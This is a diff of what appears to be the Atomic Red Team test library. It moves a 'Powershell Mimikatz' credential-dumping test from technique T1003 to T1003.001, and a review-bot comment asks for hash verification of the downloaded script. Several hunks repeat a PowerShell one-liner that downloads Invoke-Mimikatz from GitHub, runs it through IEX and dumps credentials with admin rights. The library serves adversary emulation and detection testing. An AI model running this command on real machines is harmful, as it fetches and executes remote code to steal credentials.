+ command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
+ Invoke-Mimikatz -DumpCreds
+
+'
+ name: powershell
+ elevation_required: true
T1557:
technique:
external_references:
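Review bot: The executor in the new T1003.001 entry (the `command:` line of this hunk) fetches `#{remote_script}` and hands the text straight to `IEX` with no integrity check, whereas the Gsecdump test further down this same file gates its download on `Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}`; the default URL is pinned to a commit, but nothing verifies what is actually executed once the URL is overridden or the host content changes. A consistent fix is to add a `remote_script_hash` input (SHA-256 of the pinned file, value to be filled in by the maintainers) and route the download through the same helper, e.g. `Invoke-WebRequestVerifyHash "#{remote_script}" "$env:TEMP\Invoke-Mimikatz.ps1" #{remote_script_hash}` (constructed path), then dot-source that file before `Invoke-Mimikatz -DumpCreds`. If this index and the technique markdown are regenerated from the per-technique YAML, the change belongs in that source file rather than in this hunk, and the identical copy in the T1003.001.md hunk would follow from it. Two pre-existing wording defects travel with the moved block and could be fixed at the same time: `\\\"access denied\\\"` in the description renders as literal backslashes in the generated markdown, and "privleges" should read "privileges".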
@@ -21388,28 +21410,6 @@ credential-access:
x_mitre_version: '2.0'
identifier: T1003
atomic_tests:
- - name: Powershell Mimikatz
- auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
- description: "Dumps credentials from memory via Powershell by invoking a remote
- mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
- and hashes output to the screen.\nCommon failures include seeing an \\\"access
- denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
- you try to run the test without the required administrative privleges you
- will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
- supported_platforms:
- - windows
- input_arguments:
- remote_script:
- description: URL to a remote Mimikatz script that dumps credentials
- type: Url
- default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
- executor:
- command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
- Invoke-Mimikatz -DumpCreds
-
-'
- name: powershell
- elevation_required: true
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
description: "Dump credentials from memory using Gsecdump.\n\nUpon successful
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 800e5f0cec..fdf6196eaa 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -44,6 +44,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
+- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
+
@@ -477,4 +479,36 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+
+
+
+## Atomic Test #10 - Powershell Mimikatz
+Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
+If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
+Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
+Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
+```
+
+
+
+
+
+
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 4baa2fc72e..f716aaf559 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -7,48 +7,14 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Tests
-- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
+- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
-- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
+- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
-- [Atomic Test #3 - Credential Dumping with NPPSpy](#atomic-test-3---credential-dumping-with-nppspy)
-
-
-
-## Atomic Test #1 - Powershell Mimikatz
-Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
-If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
-Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
-Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-```
-
-
-
-
-
-
-
-## Atomic Test #2 - Gsecdump
+## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
@@ -103,7 +69,7 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
-## Atomic Test #3 - Credential Dumping with NPPSpy
+## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.